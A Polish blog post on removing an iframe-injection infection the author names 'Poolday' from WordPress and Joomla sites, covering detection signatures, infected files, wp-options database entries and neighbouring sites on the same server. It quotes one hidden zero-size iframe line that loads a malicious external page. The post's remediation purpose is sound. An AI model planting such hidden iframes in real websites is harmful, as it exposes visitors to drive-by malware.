Wirus o którym mowa w dzisiejszym artykule jest ukrytym iframe’mem, ramką która pojawia się co jakiś czas na zainfekowanej witrynie. Wiele osób wykrywa go dopiero po użyciu securi.net, gdzie podawane są następujące definicje wirusa: MW:IFRAME:HD202?v02 i MW:BLK:2. Jednak nie został on do tej pory opisany w żaden konkretny sposób.
Z racji tego, że spotkałem się z nim twarzą w twarz podczas usuwania wirusów z kilku stron, postanowiłem skrobnąć na jego temat kilka słów.
Na początku napiszę, że ów wirus, nazwałem go Poolday, pojawia się w kodzie strony, a sama ramka to mniej więcej taki kod:
<iframe width="0" height="0" style="display: none;" src="http://www.poolday.info/1000"></iframe>
Jak widać ramka ustawiona jest na zerową wysokość jak i szerokość, a display: none dodatkowo ukrywa ją przed oczami ofiary (właściciela strony). Niekiedy ludzie przez wiele miesięcy nie są świadomi infekcji, ale jak wiemy Google potrafi o tym skutecznie przypomnieć oznaczając ją jako „Strona dokonująca ataków” bądź po prostu jako stronę niebezpieczną.
Klienci najczęściej zgłaszają się do mnie widząc po wejściu na swoją witrynę ekran jak na zdjęciu poniżej:
Tak, zgodnie z komunikatem iframe, o którym mowa będzie próbował wgrać na Wasze komputery złośliwe oprogramowanie, a co ono dokładnie miałoby robić? Tego chyba nie chcecie wiedzieć? Jednak nawet najpopularniejsze programy antywirusowe także blokują dostęp do stron, gdzie znajduje się ów kod, więc mając tego wirusa u siebie nie powinieneś tego ignorować. Samo Google powoli wyindeksuje Twoją witrynę, a i w wynikach wyszukiwania pojawi się komunikat o obecności wirusa na stronie.
Nie chcecie chyba, aby do spotkało także Was?
Jednak zakładając czarny scenariusz i Poolday już Was zaatakował. To co robić?
Jak usunąć wirusa?
Z doświadczenia wiem, że zostawia po sobie zarówno w Joomla jak i w WordPress masę złośliwych kodów zapisanych w plikach systemowych stron, ale dodatkowo wirus tworzy nowe pliki, które nie zawsze po popularnych wzorcach da się skutecznie wykryć i niekiedy ręczna kontrola plików pomaga nam w jego zwalczeniu.
Nie polecam ufać nadmienię wtyczkom antywirusowym do WordPressa, one znajdą i usuną część problemu, ale nie wyszukają wszystkiego. Co więcej, nawet po usunięciu zainfekowanych plików kod iframe dalej będzie dodawany do kodu strony.
Nie dajcie się zwieść jeśli securi scan bądź inne online’owe narzędzie pokaże Wam, że strona jest czysta od Malware. Spróbujcie skan robić co kilka godzin, a zauważycie, że iframe raz jest na stronie, a raz go nie ma. Ciekawe co nie?
Więc co robić, aby pozbyć się Poolday ze strony skoro zakładam, że usunęliście wszystkie zainfekowane pliki? Zajrzyjcie do bazy danych, przejrzyjcie wpisy i tabele wp-options, a z pewnością Waszym oczom ukaże się ów wirusek, który czeka, aby cyklicznie uaktywniać się na Waszej witrynie.
Jednak to nie koniec… Na serwerze, gdzie znajduje się zainfekowana strona znajduje się więcej stron? Jeśli tak to bądźcie pewni, że i one są zainfekowane – może obecnie tego nie widać, ale złośliwy kod, który mieliście w plikach wyszukuje wszelkie instancje WordPressa i Joomli na serwerze i kopiuje się, rozwija i rozprzestrzenia. Także, aby pozbyć się wirusa ostatecznie należy oczyścić nie tylko źródło, ale także sąsiedztwo bo może okazać się, że to co myśleliśmy, że jest źródłem infekcji nim nie jest.
Ostatnie komentarze